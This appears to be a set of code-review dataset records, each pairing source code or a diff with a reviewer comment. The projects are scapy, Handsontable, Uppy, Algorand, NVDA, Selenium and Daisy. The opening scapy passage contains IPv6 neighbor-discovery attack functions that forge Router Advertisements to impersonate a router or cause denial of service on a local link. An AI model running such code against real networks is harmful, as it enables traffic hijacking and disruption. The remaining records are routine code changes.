RA sent with source address %s" % src) if not iface: iface = conf.iface # To prevent sniffing our own traffic if not reply_mac: reply_mac = get_if_hwaddr(iface) sniff_filter = "icmp6 and not ether src %s" % reply_mac sniff(store=0, filter=sniff_filter, lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter), prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface), iface=iface) def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None, ip_src_filter=None): """ The purpose of this function is to send provided RA message at layer 2 (i.e. providing a packet starting with IPv6 will not work) in response to received RS messages. In the end, the function is a simple wrapper around sendp() that monitor the link for RS messages. It is probably better explained with an example: >>> ra = Ether()/IPv6()/ICMPv6ND_RA() >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64) >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64) >>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55") >>> NDP_Attack_Fake_Router(ra, iface="eth0") Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573 Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae ... Following arguments can be used to change the behavior: ra: the RA message to send in response to received RS message. iface: a specific interface (e.g. "eth0") of the system on which the DoS should be launched. If none is provided, conf.iface is used. mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. Only RS messages received from this source will trigger a reply. Note that no changes to provided RA is done which imply that if you intend to target only the source of the RS using this option, you will have to set the Ethernet destination address to the same value in your RA. The default value for this parameter is None: no filtering on the source of RS is done. ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter on. Only RS messages received from this source address will trigger replies. Same comment as for previous argument apply: if you use the option, you will probably want to set a specific Ethernet destination address in the RA. """ def is_request(req, mac_src_filter, ip_src_filter): """ Check if packet req is a request """ if not (Ether in req and IPv6 in req and ICMPv6ND_RS in req): return 0 mac_src = req[Ether].src if mac_src_filter and mac_src != mac_src_filter: return 0 ip_src = req[IPv6].src if ip_src_filter and ip_src != ip_src_filter: return 0 return 1 def ra_reply_callback(req, iface): """ Callback that sends an RA in reply to an RS """ src = req[IPv6].src sendp(ra, iface=iface, verbose=0) print("Fake RA sent in response to RS from %s" % src) if not iface: iface = conf.iface sniff_filter = "icmp6" sniff(store=0, filter=sniff_filter, lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter), prn=lambda x: ra_reply_callback(x, iface), iface=iface) ############################################################################# # Pre-load classes ## ############################################################################# def _get_cls(name): return globals().get(name, Raw) def _load_dict(d): for k, v in d.items(): d[k] = _get_cls(v) _load_dict(icmp6ndoptscls) _load_dict(icmp6typescls) _load_dict(ipv6nhcls) ############################################################################# ############################################################################# # Layers binding # ############################################################################# ############################################################################# conf.l3types.register(ETH_P_IPV6, IPv6) conf.l2types.register(31, IPv6) conf.l2types.register(DLT_IPV6, IPv6) conf.l2types.register(DLT_RAW, _IPv46) conf.l2types.register_num2layer(DLT_RAW_ALT, _IPv46) bind_layers(Ether, IPv6, type=0x86dd) bind_layers(CookedLinux, IPv6, proto=0x86dd) bind_layers(GRE, IPv6, proto=0x86dd) bind_layers(SNAP, IPv6, code=0x86dd) bind_layers(Loopback, IPv6, type=socket.AF_INET6) bind_layers(IPerror6, TCPerror, nh=socket.IPPROTO_TCP) bind_layers(IPerror6, UDPerror, nh=socket.IPPROTO_UDP) bind_layers(IPv6, TCP, nh=socket.IPPROTO_TCP) bind_layers(IPv6, UDP, nh=socket.IPPROTO_UDP) bind_layers(IP, IPv6, proto=socket.IPPROTO_IPV6) bind_layers(IPv6, IPv6, nh=socket.IPPROTO_IPV6) bind_layers(IPv6, IP, nh=socket.IPPROTO_IPIP) bind_layers(IPv6, GRE, nh=socket.IPPROTO_GRE)
1
16,544
It's because of this change. `ss` was unused and it made sense in the program. However I haven't read the IPv6 RFC so I'm unsure of what it does
secdev-scapy
py
@@ -483,6 +483,7 @@ class DataManager { */ addChildAtIndex(parent, index, element) { let childElement = element; + let flattenIndex; if (!childElement) { childElement = this.mockNode();
1
import { rangeEach } from '../../../helpers/number'; import { objectEach } from '../../../helpers/object'; import { arrayEach } from '../../../helpers/array'; /** * Class responsible for making data operations. * * @class * @private */ class DataManager { constructor(nestedRowsPlugin, hotInstance) { /** * Main Handsontable instance reference. * * @type {object} */ this.hot = hotInstance; /** * Reference to the source data object. * * @type {Handsontable.CellValue[][]|Handsontable.RowObject[]} */ this.data = null; /** * Reference to the NestedRows plugin. * * @type {object} */ this.plugin = nestedRowsPlugin; /** * Map of row object parents. * * @type {WeakMap} */ this.parentReference = new WeakMap(); /** * Nested structure cache. * * @type {object} */ this.cache = { levels: [], levelCount: 0, rows: [], nodeInfo: new WeakMap() }; } /** * Set the data for the manager. * * @param {Handsontable.CellValue[][]|Handsontable.RowObject[]} data Data for the manager. */ setData(data) { this.data = data; } /** * Get the data cached in the manager. * * @returns {Handsontable.CellValue[][]|Handsontable.RowObject[]} */ getData() { return this.data; } /** * Load the "raw" source data, without NestedRows' modifications. * * @returns {Handsontable.CellValue[][]|Handsontable.RowObject[]} */ getRawSourceData() { let rawSourceData = null; this.plugin.disableCoreAPIModifiers(); rawSourceData = this.hot.getSourceData(); this.plugin.enableCoreAPIModifiers(); return rawSourceData; } /** * Update the Data Manager with new data and refresh cache. * * @param {Handsontable.CellValue[][]|Handsontable.RowObject[]} data Data for the manager. */ updateWithData(data) { this.setData(data); this.rewriteCache(); } /** * Rewrite the nested structure cache. * * @private */ rewriteCache() { this.cache = { levels: [], levelCount: 0, rows: [], nodeInfo: new WeakMap() }; rangeEach(0, this.data.length - 1, (i) => { this.cacheNode(this.data[i], 0, null); }); } /** * Cache a data node. * * @private * @param {object} node Node to cache. * @param {number} level Level of the node. * @param {object} parent Parent of the node. */ cacheNode(node, level, parent) { if (!this.cache.levels[level]) { this.cache.levels[level] = []; this.cache.levelCount += 1; } this.cache.levels[level].push(node); this.cache.rows.push(node); this.cache.nodeInfo.set(node, { parent, row: this.cache.rows.length - 1, level }); if (this.hasChildren(node)) { arrayEach(node.__children, (elem) => { this.cacheNode(elem, level + 1, node); }); } } /** * Get the date for the provided visual row number. * * @param {number} row Row index. * @returns {object} */ getDataObject(row) { return row === null || row === void 0 ? null : this.cache.rows[row]; } /** * Read the row tree in search for a specific row index or row object. * * @private * @param {object} parent The initial parent object. * @param {number} readCount Number of read nodes. * @param {number} neededIndex The row index we search for. * @param {object} neededObject The row object we search for. * @returns {number|object} */ readTreeNodes(parent, readCount, neededIndex, neededObject) { let rootLevel = false; let readNodesCount = readCount; if (isNaN(readNodesCount) && readNodesCount.end) { return readNodesCount; } let parentObj = parent; if (!parentObj) { parentObj = { __children: this.data }; rootLevel = true; readNodesCount -= 1; } if (neededIndex !== null && neededIndex !== void 0 && readNodesCount === neededIndex) { return { result: parentObj, end: true }; } if (neededObject !== null && neededObject !== void 0 && parentObj === neededObject) { return { result: readNodesCount, end: true }; } readNodesCount += 1; if (parentObj.__children) { arrayEach(parentObj.__children, (val) => { this.parentReference.set(val, rootLevel ? null : parentObj); readNodesCount = this.readTreeNodes(val, readNodesCount, neededIndex, neededObject); if (isNaN(readNodesCount) && readNodesCount.end) { return false; } }); } return readNodesCount; } /** * Mock a parent node. * * @private * @returns {*} */ mockParent() { const fakeParent = this.mockNode(); fakeParent.__children = this.data; return fakeParent; } /** * Mock a data node. * * @private * @returns {{}} */ mockNode() { const fakeNode = {}; objectEach(this.data[0], (val, key) => { fakeNode[key] = null; }); return fakeNode; } /** * Get the row index for the provided row object. * * @param {object} rowObj The row object. * @returns {number} Row index. */ getRowIndex(rowObj) { return rowObj === null || rowObj === void 0 ? null : this.cache.nodeInfo.get(rowObj).row; } /** * Get the index of the provided row index/row object within its parent. * * @param {number|object} row Row index / row object. * @returns {number} */ getRowIndexWithinParent(row) { let rowObj = null; if (isNaN(row)) { rowObj = row; } else { rowObj = this.getDataObject(row); } const parent = this.getRowParent(row); if (parent === null || parent === void 0) { return this.data.indexOf(rowObj); } return parent.__children.indexOf(rowObj); } /** * Count all rows (including all parents and children). * * @returns {number} */ countAllRows() { const rootNodeMock = { __children: this.data }; return this.countChildren(rootNodeMock); } /** * Count children of the provided parent. * * @param {object|number} parent Parent node. * @returns {number} Children count. */ countChildren(parent) { let rowCount = 0; let parentNode = parent; if (!isNaN(parentNode)) { parentNode = this.getDataObject(parentNode); } if (!parentNode || !parentNode.__children) { return 0; } arrayEach(parentNode.__children, (elem) => { rowCount += 1; if (elem.__children) { rowCount += this.countChildren(elem); } }); return rowCount; } /** * Get the parent of the row at the provided index. * * @param {number|object} row Physical row index. * @returns {object} */ getRowParent(row) { let rowObject; if (isNaN(row)) { rowObject = row; } else { rowObject = this.getDataObject(row); } return this.getRowObjectParent(rowObject); } /** * Get the parent of the provided row object. * * @private * @param {object} rowObject The row object (tree node). * @returns {object|null} */ getRowObjectParent(rowObject) { if (!rowObject || typeof rowObject !== 'object') { return null; } return this.cache.nodeInfo.get(rowObject).parent; } /** * Get the nesting level for the row with the provided row index. * * @param {number} row Row index. * @returns {number|null} Row level or null, when row doesn't exist. */ getRowLevel(row) { let rowObject = null; if (isNaN(row)) { rowObject = row; } else { rowObject = this.getDataObject(row); } return rowObject ? this.getRowObjectLevel(rowObject) : null; } /** * Get the nesting level for the row with the provided row index. * * @private * @param {object} rowObject Row object. * @returns {number} Row level. */ getRowObjectLevel(rowObject) { return rowObject === null || rowObject === void 0 ? null : this.cache.nodeInfo.get(rowObject).level; } /** * Check if the provided row/row element has children. * * @param {number|object} row Row number or row element. * @returns {boolean} */ hasChildren(row) { let rowObj = row; if (!isNaN(rowObj)) { rowObj = this.getDataObject(rowObj); } return !!(rowObj.__children && rowObj.__children.length); } /** * Returns `true` if the row at the provided index has a parent. * * @param {number} index Row index. * @returns {boolean} `true` if the row at the provided index has a parent, `false` otherwise. */ isChild(index) { return this.getRowParent(index) !== null; } /** * Get child at a provided index from the parent element. * * @param {object} parent The parent row object. * @param {number} index Index of the child element to be retrieved. * @returns {object|null} The child element or `null` if the child doesn't exist. */ getChild(parent, index) { return parent.__children?.[index] || null; } /** * Return `true` of the row at the provided index is located at the topmost level. * * @param {number} index Row index. * @returns {boolean} `true` of the row at the provided index is located at the topmost level, `false` otherwise. */ isRowHighestLevel(index) { return !this.isChild(index); } /** * Return `true` if the provided row index / row object represents a parent in the nested structure. * * @param {number|object} row Row index / row object. * @returns {boolean} `true` if the row is a parent, `false` otherwise. */ isParent(row) { let rowObj = row; if (!isNaN(rowObj)) { rowObj = this.getDataObject(rowObj); } return rowObj && (!!rowObj.__children && rowObj.__children?.length !== 0); } /** * Add a child to the provided parent. It's optional to add a row object as the "element". * * @param {object} parent The parent row object. * @param {object} [element] The element to add as a child. */ addChild(parent, element) { let childElement = element; this.hot.runHooks('beforeAddChild', parent, childElement); let parentIndex = null; if (parent) { parentIndex = this.getRowIndex(parent); } this.hot.runHooks('beforeCreateRow', parentIndex + this.countChildren(parent) + 1, 1); let functionalParent = parent; if (!parent) { functionalParent = this.mockParent(); } if (!functionalParent.__children) { functionalParent.__children = []; } if (!childElement) { childElement = this.mockNode(); } functionalParent.__children.push(childElement); this.rewriteCache(); const newRowIndex = this.getRowIndex(childElement); this.hot.rowIndexMapper.insertIndexes(newRowIndex, 1); this.hot.runHooks('afterCreateRow', newRowIndex, 1); this.hot.runHooks('afterAddChild', parent, childElement); } /** * Add a child node to the provided parent at a specified index. * * @param {object} parent Parent node. * @param {number} index Index to insert the child element at. * @param {object} [element] Element (node) to insert. */ addChildAtIndex(parent, index, element) { let childElement = element; if (!childElement) { childElement = this.mockNode(); } this.hot.runHooks('beforeAddChild', parent, childElement, index); if (parent) { const parentIndex = this.getRowIndex(parent); const finalChildIndex = parentIndex + index + 1; this.hot.runHooks('beforeCreateRow', finalChildIndex, 1); parent.__children.splice(index, null, childElement); this.rewriteCache(); this.plugin.disableCoreAPIModifiers(); this.hot.setSourceDataAtCell( this.getRowIndexWithinParent(parent), '__children', parent.__children, 'NestedRows.addChildAtIndex' ); this.hot.rowIndexMapper.insertIndexes(finalChildIndex, 1); this.plugin.enableCoreAPIModifiers(); this.hot.runHooks('afterCreateRow', finalChildIndex, 1); } else { this.plugin.disableCoreAPIModifiers(); this.hot.alter('insert_row', index, 1, 'NestedRows.addChildAtIndex'); this.plugin.enableCoreAPIModifiers(); } // Workaround for refreshing cache losing the reference to the mocked row. childElement = this.getDataObject(index); this.hot.runHooks('afterAddChild', parent, childElement, index); } /** * Add a sibling element at the specified index. * * @param {number} index New element sibling's index. * @param {('above'|'below')} where Direction in which the sibling is to be created. */ addSibling(index, where = 'below') { const translatedIndex = this.translateTrimmedRow(index); const parent = this.getRowParent(translatedIndex); const indexWithinParent = this.getRowIndexWithinParent(translatedIndex); switch (where) { case 'below': this.addChildAtIndex(parent, indexWithinParent + 1, null); break; case 'above': this.addChildAtIndex(parent, indexWithinParent, null); break; default: break; } } /** * Detach the provided element from its parent and add it right after it. * * @param {object|Array} elements Row object or an array of selected coordinates. * @param {boolean} [forceRender=true] If true (default), it triggers render after finished. */ detachFromParent(elements, forceRender = true) { let element = null; const rowObjects = []; if (Array.isArray(elements)) { rangeEach(elements[0], elements[2], (i) => { const translatedIndex = this.translateTrimmedRow(i); rowObjects.push(this.getDataObject(translatedIndex)); }); rangeEach(0, rowObjects.length - 2, (i) => { this.detachFromParent(rowObjects[i], false); }); element = rowObjects[rowObjects.length - 1]; } else { element = elements; } const childRowIndex = this.getRowIndex(element); const childCount = this.countChildren(element); const indexWithinParent = this.getRowIndexWithinParent(element); const parent = this.getRowParent(element); const grandparent = this.getRowParent(parent); const grandparentRowIndex = this.getRowIndex(grandparent); let movedElementRowIndex = null; this.hot.runHooks('beforeDetachChild', parent, element); if (indexWithinParent !== null && indexWithinParent !== void 0) { const removedRowIndexes = Array.from( new Array(childRowIndex + childCount + 1).keys() ).splice(-1 * (childCount + 1)); this.hot.runHooks( 'beforeRemoveRow', childRowIndex, childCount + 1, removedRowIndexes, this.plugin.pluginName ); parent.__children.splice(indexWithinParent, 1); this.rewriteCache(); this.hot.runHooks( 'afterRemoveRow', childRowIndex, childCount + 1, removedRowIndexes, this.plugin.pluginName ); if (grandparent) { movedElementRowIndex = grandparentRowIndex + this.countChildren(grandparent); const lastGrandparentChild = this.getChild(grandparent, this.countChildren(grandparent) - 1); const lastGrandparentChildIndex = this.getRowIndex(lastGrandparentChild); this.hot.runHooks('beforeCreateRow', lastGrandparentChildIndex + 1, childCount + 1, this.plugin.pluginName); grandparent.__children.push(element); } else { movedElementRowIndex = this.hot.countRows() + 1; this.hot.runHooks('beforeCreateRow', movedElementRowIndex - 2, childCount + 1, this.plugin.pluginName); this.data.push(element); } } this.rewriteCache(); this.hot.runHooks('afterCreateRow', movedElementRowIndex - 2, childCount + 1, this.plugin.pluginName); this.hot.runHooks('afterDetachChild', parent, element, this.getRowIndex(element)); if (forceRender) { this.hot.render(); } } /** * Filter the data by the `logicRows` array. * * @private * @param {number} index Index of the first row to remove. * @param {number} amount Number of elements to remove. * @param {Array} logicRows Array of indexes to remove. */ filterData(index, amount, logicRows) { // TODO: why are the first 2 arguments not used? const elementsToRemove = []; arrayEach(logicRows, (elem) => { elementsToRemove.push(this.getDataObject(elem)); }); arrayEach(elementsToRemove, (elem) => { const indexWithinParent = this.getRowIndexWithinParent(elem); const tempParent = this.getRowParent(elem); if (tempParent === null) { this.data.splice(indexWithinParent, 1); } else { tempParent.__children.splice(indexWithinParent, 1); } }); this.rewriteCache(); } /** * Used to splice the source data. Needed to properly modify the nested structure, which wouldn't work with the * default script. * * @private * @param {number} index Physical index of the element at the splice beginning. * @param {number} amount Number of elements to be removed. * @param {object[]} elements Array of row objects to add. */ spliceData(index, amount, elements) { const previousElement = this.getDataObject(index - 1); let newRowParent = null; let indexWithinParent = index; if (previousElement && previousElement.__children && previousElement.__children.length === 0) { newRowParent = previousElement; indexWithinParent = 0; } else if (index < this.countAllRows()) { newRowParent = this.getRowParent(index); indexWithinParent = this.getRowIndexWithinParent(index); } if (newRowParent) { if (elements) { newRowParent.__children.splice(indexWithinParent, amount, ...elements); } else { newRowParent.__children.splice(indexWithinParent, amount); } } else if (elements) { this.data.splice(indexWithinParent, amount, ...elements); } else { this.data.splice(indexWithinParent, amount); } this.rewriteCache(); } /** * Update the `__children` key of the upmost parent of the provided row object. * * @private * @param {object} rowElement Row object. */ syncRowWithRawSource(rowElement) { let upmostParent = rowElement; let tempParent = null; do { tempParent = this.getRowParent(tempParent); if (tempParent !== null) { upmostParent = tempParent; } } while (tempParent !== null); this.plugin.disableCoreAPIModifiers(); this.hot.setSourceDataAtCell( this.getRowIndex(upmostParent), '__children', upmostParent.__children, 'NestedRows.syncRowWithRawSource', ); this.plugin.enableCoreAPIModifiers(); } /* eslint-disable jsdoc/require-param */ /** * Move a single row. * * @param {number} fromIndex Index of the row to be moved. * @param {number} toIndex Index of the destination. * @param {boolean} moveToCollapsed `true` if moving a row to a collapsed parent. * @param {boolean} moveToLastChild `true` if moving a row to be a last child of the new parent. */ /* eslint-enable jsdoc/require-param */ moveRow(fromIndex, toIndex, moveToCollapsed, moveToLastChild) { const moveToLastRow = toIndex === this.hot.countRows(); const fromParent = this.getRowParent(fromIndex); const indexInFromParent = this.getRowIndexWithinParent(fromIndex); const elemToMove = fromParent.__children.slice(indexInFromParent, indexInFromParent + 1); const movingUp = fromIndex > toIndex; let toParent = moveToLastRow ? this.getRowParent(toIndex - 1) : this.getRowParent(toIndex); if (toParent === null || toParent === void 0) { toParent = this.getRowParent(toIndex - 1); } if (toParent === null || toParent === void 0) { toParent = this.getDataObject(toIndex - 1); } if (!toParent) { toParent = this.getDataObject(toIndex); toParent.__children = []; } else if (!toParent.__children) { toParent.__children = []; } const indexInTargetParent = moveToLastRow || moveToCollapsed || moveToLastChild ? toParent.__children.length : this.getRowIndexWithinParent(toIndex); const sameParent = fromParent === toParent; toParent.__children.splice(indexInTargetParent, 0, elemToMove[0]); fromParent.__children.splice(indexInFromParent + (movingUp && sameParent ? 1 : 0), 1); // Sync the changes in the cached data with the actual data stored in HOT. this.syncRowWithRawSource(fromParent); if (!sameParent) { this.syncRowWithRawSource(toParent); } } /** * Translate the visual row index to the physical index, taking into consideration the state of collapsed rows. * * @private * @param {number} row Row index. * @returns {number} */ translateTrimmedRow(row) { if (this.plugin.collapsingUI) { return this.plugin.collapsingUI.translateTrimmedRow(row); } return row; } /** * Translate the physical row index to the visual index, taking into consideration the state of collapsed rows. * * @private * @param {number} row Row index. * @returns {number} */ untranslateTrimmedRow(row) { if (this.plugin.collapsingUI) { return this.plugin.collapsingUI.untranslateTrimmedRow(row); } return row; } } export default DataManager;
1
20,014
"Flatten" is a verb, so I'd probably go with `flattenedIndex` as a variable name here.
handsontable-handsontable
js
@@ -1,5 +1,19 @@ const chalk = require('chalk') +const valuesToMask = [] +/** + * Adds a list of strings that should be masked by the logger. + * This function can only be called once through out the life of the server. + * @param {Array} maskables a list of strings to be masked + */ +exports.addMaskables = (maskables) => { + maskables.forEach((i) => { + valuesToMask.push(i) + }) + + Object.freeze(valuesToMask) +} + /** * INFO level log * @param {string} msg the message to log
1
const chalk = require('chalk') /** * INFO level log * @param {string} msg the message to log * @param {string=} tag a unique tag to easily search for this message * @param {string=} traceId a unique id to easily trace logs tied to a request */ exports.info = (msg, tag, traceId) => { log(msg, tag, 'info', traceId) } /** * WARN level log * @param {string} msg the message to log * @param {string=} tag a unique tag to easily search for this message * @param {string=} traceId a unique id to easily trace logs tied to a request */ exports.warn = (msg, tag, traceId) => { // @ts-ignore log(msg, tag, 'warn', traceId, chalk.bold.yellow) } /** * ERROR level log * @param {string | Error} msg the message to log * @param {string=} tag a unique tag to easily search for this message * @param {string=} traceId a unique id to easily trace logs tied to a request */ exports.error = (msg, tag, traceId) => { // @ts-ignore log(msg, tag, 'error', traceId, chalk.bold.red) } /** * DEBUG level log * @param {string} msg the message to log * @param {string=} tag a unique tag to easily search for this message * @param {string=} traceId a unique id to easily trace logs tied to a request */ exports.debug = (msg, tag, traceId) => { if (process.env.NODE_ENV !== 'production') { log(msg, tag, 'debug', traceId) } } /** * message log * @param {string | Error} msg the message to log * @param {string} tag a unique tag to easily search for this message * @param {string} level error | info | debug * @param {function=} color function to display the log in appropriate color * @param {string=} id a unique id to easily trace logs tied to a request */ const log = (msg, tag, level, id, color) => { const time = new Date().toISOString() tag = tag || '' id = id || '' const whitespace = tag && id ? ' ' : '' color = color || ((message) => message) // exclude msg from template string so values such as error objects // can be well formatted console.log(color(`companion: ${time} [${level}] ${id}${whitespace}${tag}`), color(msg)) }
1
13,016
If it can only be called once, perhaps a more appropriate name is something like `setMaskables`? `addX` sounds like you can add many `X`es by calling it many times
transloadit-uppy
js
@@ -38,7 +38,7 @@ func downloadAndExtractConfigPackage(channel string, targetDir string) (err erro } func downloadConfigPackage(channelName string, targetDir string) (packageFile string, err error) { - s3, err := s3.MakeS3SessionForDownload() + s3, err := s3.MakePublicS3SessionForDownload() if err != nil { return }
1
// Copyright (C) 2019 Algorand, Inc. // This file is part of go-algorand // // go-algorand is free software: you can redistribute it and/or modify // it under the terms of the GNU Affero General Public License as // published by the Free Software Foundation, either version 3 of the // License, or (at your option) any later version. // // go-algorand is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU Affero General Public License for more details. // // You should have received a copy of the GNU Affero General Public License // along with go-algorand. If not, see <https://www.gnu.org/licenses/>. package main import ( "fmt" "os" "path/filepath" "github.com/algorand/go-algorand/util/s3" "github.com/algorand/go-algorand/util/tar" ) func downloadAndExtractConfigPackage(channel string, targetDir string) (err error) { fmt.Fprintf(os.Stdout, "Downloading latest configuration file for '%s'...\n", channel) packageFile, err := downloadConfigPackage(channel, targetDir) if err != nil { return fmt.Errorf("error downloading config package for channel '%s': %v", channel, err) } // Extract package and update configFilename fmt.Fprintf(os.Stdout, "Expanding configuration package '%s' to %s\n", packageFile, targetDir) return extractConfigPackage(packageFile, targetDir) } func downloadConfigPackage(channelName string, targetDir string) (packageFile string, err error) { s3, err := s3.MakeS3SessionForDownload() if err != nil { return } prefix := fmt.Sprintf("config_%s", channelName) version, name, err := s3.GetLatestVersion(prefix) if err != nil { return } if version == 0 { err = fmt.Errorf("no config package found for channel '%s'", channelName) return } packageFile = filepath.Join(targetDir, name) file, err := os.Create(packageFile) if err != nil { return } defer file.Close() if err = s3.DownloadFile(name, file); err != nil { err = fmt.Errorf("error downloading file: %v", err) return } return } func extractConfigPackage(packageFile string, targetDir string) (err error) { err = tar.UncompressFile(packageFile, targetDir) if err != nil { return } return }
1
35,430
Nodecfg should be downloading from a private bucket -- these shouldn't be for public consumption. In general these should be generic and expect environment to provide appropriate credentials and bucket.
algorand-go-algorand
go
@@ -0,0 +1,17 @@ +# MicrosoftEdge.py +#A part of NonVisual Desktop Access (NVDA) +#This file is covered by the GNU General Public License. +#See the file COPYING for more details. +#Copyright (C) 2018 NV Access Limited, Joseph Lee + +"""appModule for Microsoft Edge main process""" + +import appModuleHandler +import ui + +class AppModule(appModuleHandler.AppModule): + + def event_UIA_notification(self, obj, nextHandler, displayString=None, **kwargs): + # #8423: even though content process is focused, notifications are fired by main Edge process. + # The base object will simply ignore this, so notifications must be announced here and no more. + ui.message(displayString)
1
1
22,507
Could you please end the file with an empty line?
nvaccess-nvda
py
@@ -76,7 +76,7 @@ public class ProtocolHandshake { if (result.isPresent()) { Result toReturn = result.get(); - LOG.info(String.format("Detected dialect: %s", toReturn.dialect)); + LOG.finest(String.format("Detected dialect: %s", toReturn.dialect)); return toReturn; } }
1
// Licensed to the Software Freedom Conservancy (SFC) under one // or more contributor license agreements. See the NOTICE file // distributed with this work for additional information // regarding copyright ownership. The SFC licenses this file // to you under the Apache License, Version 2.0 (the // "License"); you may not use this file except in compliance // with the License. You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, // software distributed under the License is distributed on an // "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY // KIND, either express or implied. See the License for the // specific language governing permissions and limitations // under the License. package org.openqa.selenium.remote; import static com.google.common.net.HttpHeaders.CONTENT_LENGTH; import static com.google.common.net.HttpHeaders.CONTENT_TYPE; import static com.google.common.net.MediaType.JSON_UTF_8; import static java.nio.charset.StandardCharsets.UTF_8; import static org.openqa.selenium.remote.CapabilityType.PROXY; import static org.openqa.selenium.remote.http.Contents.string; import com.google.common.base.Preconditions; import com.google.common.io.CountingOutputStream; import com.google.common.io.FileBackedOutputStream; import org.openqa.selenium.Capabilities; import org.openqa.selenium.ImmutableCapabilities; import org.openqa.selenium.Proxy; import org.openqa.selenium.SessionNotCreatedException; import org.openqa.selenium.WebDriverException; import org.openqa.selenium.json.Json; import org.openqa.selenium.json.JsonException; import org.openqa.selenium.remote.http.HttpClient; import org.openqa.selenium.remote.http.HttpMethod; import org.openqa.selenium.remote.http.HttpRequest; import org.openqa.selenium.remote.http.HttpResponse; import java.io.BufferedInputStream; import java.io.IOException; import java.io.InputStream; import java.io.OutputStreamWriter; import java.io.Writer; import java.util.Map; import java.util.Objects; import java.util.Optional; import java.util.function.Function; import java.util.logging.Logger; import java.util.stream.Stream; public class ProtocolHandshake { private final static Logger LOG = Logger.getLogger(ProtocolHandshake.class.getName()); public Result createSession(HttpClient client, Command command) throws IOException { Capabilities desired = (Capabilities) command.getParameters().get("desiredCapabilities"); desired = desired == null ? new ImmutableCapabilities() : desired; int threshold = (int) Math.min(Runtime.getRuntime().freeMemory() / 10, Integer.MAX_VALUE); FileBackedOutputStream os = new FileBackedOutputStream(threshold); try ( CountingOutputStream counter = new CountingOutputStream(os); Writer writer = new OutputStreamWriter(counter, UTF_8); NewSessionPayload payload = NewSessionPayload.create(desired)) { payload.writeTo(writer); try (InputStream rawIn = os.asByteSource().openBufferedStream(); BufferedInputStream contentStream = new BufferedInputStream(rawIn)) { Optional<Result> result = createSession(client, contentStream, counter.getCount()); if (result.isPresent()) { Result toReturn = result.get(); LOG.info(String.format("Detected dialect: %s", toReturn.dialect)); return toReturn; } } } finally { os.reset(); } throw new SessionNotCreatedException( String.format( "Unable to create new remote session. " + "desired capabilities = %s", desired)); } private Optional<Result> createSession(HttpClient client, InputStream newSessionBlob, long size) throws IOException { // Create the http request and send it HttpRequest request = new HttpRequest(HttpMethod.POST, "/session"); HttpResponse response; long start = System.currentTimeMillis(); request.setHeader(CONTENT_LENGTH, String.valueOf(size)); request.setHeader(CONTENT_TYPE, JSON_UTF_8.toString()); request.setContent(() -> newSessionBlob); response = client.execute(request); long time = System.currentTimeMillis() - start; // Ignore the content type. It may not have been set. Strictly speaking we're not following the // W3C spec properly. Oh well. Map<?, ?> blob; try { blob = new Json().toType(string(response), Map.class); } catch (JsonException e) { throw new WebDriverException( "Unable to parse remote response: " + string(response), e); } InitialHandshakeResponse initialResponse = new InitialHandshakeResponse( time, response.getStatus(), blob); return Stream.of( new W3CHandshakeResponse().getResponseFunction(), new JsonWireProtocolResponse().getResponseFunction()) .map(func -> func.apply(initialResponse)) .filter(Objects::nonNull) .findFirst(); } public static class Result { private static Function<Object, Proxy> massageProxy = obj -> { if (obj instanceof Proxy) { return (Proxy) obj; } if (!(obj instanceof Map)) { return null; } Map<?, ?> rawMap = (Map<?, ?>) obj; for (Object key : rawMap.keySet()) { if (!(key instanceof String)) { return null; } } // This cast is now safe. //noinspection unchecked return new Proxy((Map<String, ?>) obj); }; private final Dialect dialect; private final Map<String, ?> capabilities; private final SessionId sessionId; Result(Dialect dialect, String sessionId, Map<String, ?> capabilities) { this.dialect = dialect; this.sessionId = new SessionId(Preconditions.checkNotNull(sessionId)); this.capabilities = capabilities; if (capabilities.containsKey(PROXY)) { //noinspection unchecked ((Map<String, Object>) capabilities) .put(PROXY, massageProxy.apply(capabilities.get(PROXY))); } } public Dialect getDialect() { return dialect; } public Response createResponse() { Response response = new Response(sessionId); response.setValue(capabilities); response.setStatus(ErrorCodes.SUCCESS); response.setState(ErrorCodes.SUCCESS_STRING); return response; } @Override public String toString() { return String.format("%s: %s", dialect, capabilities); } } }
1
16,445
This is an incorrect change. The dialect spoken is an important part of the handshake and should be communicated to users.
SeleniumHQ-selenium
js
@@ -89,7 +89,9 @@ func (v *Var) UnmarshalJSON(b []byte) error { // Workflow is a single Daisy workflow workflow. type Workflow struct { // Populated on New() construction. - Cancel chan struct{} `json:"-"` + Cancel chan struct{} `json:"-"` + isCanceled bool + isCanceledMx sync.Mutex // Workflow template fields. // Workflow name.
1
// Copyright 2017 Google Inc. All Rights Reserved. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. // Package daisy describes a daisy workflow. package daisy import ( "bytes" "context" "encoding/json" "fmt" "io/ioutil" "os" "path" "path/filepath" "reflect" "strconv" "strings" "sync" "time" "cloud.google.com/go/logging" "cloud.google.com/go/storage" "github.com/GoogleCloudPlatform/compute-image-tools/daisy/compute" "google.golang.org/api/iterator" "google.golang.org/api/option" ) const defaultTimeout = "10m" func daisyBkt(ctx context.Context, client *storage.Client, project string) (string, DError) { dBkt := strings.Replace(project, ":", "-", -1) + "-daisy-bkt" it := client.Buckets(ctx, project) for bucketAttrs, err := it.Next(); err != iterator.Done; bucketAttrs, err = it.Next() { if err != nil { return "", 